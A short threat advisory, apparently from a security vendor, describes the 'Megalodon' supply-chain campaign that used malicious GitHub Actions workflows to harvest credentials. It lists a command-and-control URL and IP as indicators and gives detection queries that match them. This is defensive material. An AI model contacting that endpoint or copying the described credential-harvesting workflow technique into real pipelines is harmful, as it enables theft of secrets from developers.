Date: 06/05/2026
Severity: High
Summary
A large-scale software supply chain campaign dubbed Megalodon leveraged malicious GitHub Actions workflow modifications to steal sensitive credentials from affected repositories. Analysis revealed credential harvesting capabilities targeting GitHub tokens, cloud credentials, API keys, database secrets, and private keys.The attack abused trusted CI/CD workflows by embedding obfuscated payloads that executed during automated build processes. Investigation uncovered evidence of external command-and-control (C2) communication and large-scale distribution of similar malicious payloads across thousands of GitHub repositories, highlighting the growing risk posed by CI/CD pipeline compromises within the open-source ecosystem.Organizations relying on GitHub Actions and automated software delivery pipelines should carefully review workflow changes, monitor credential exposure, and strengthen repository security controls to mitigate similar threats.
Indicators of Compromise (IOC) List
Domain : | http://216.126.225.129:8443?h=megalodon&l=gh_dump&id=hefs8esnhgkx |
IP Address: | 216.126.225.129 |
Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection
Detection Query 1 : | domainname like "http://216.126.225.129:8443?h=megalodon&l=gh_dump&id=hefs8esnhgkx" or url like "http://216.126.225.129:8443?h=megalodon&l=gh_dump&id=hefs8esnhgkx" or siteurl like "http://216.126.225.129:8443?h=megalodon&l=gh_dump&id=hefs8esnhgkx" |
Detection Query 2 : | dstipaddress IN ("216.126.225.129") or srcipaddress IN ("216.126.225.129") |
Reference:
https://gurucul.com/blog/megalodon-malware-found-in-2800-github-files-through-malicious-github-actions-workflows/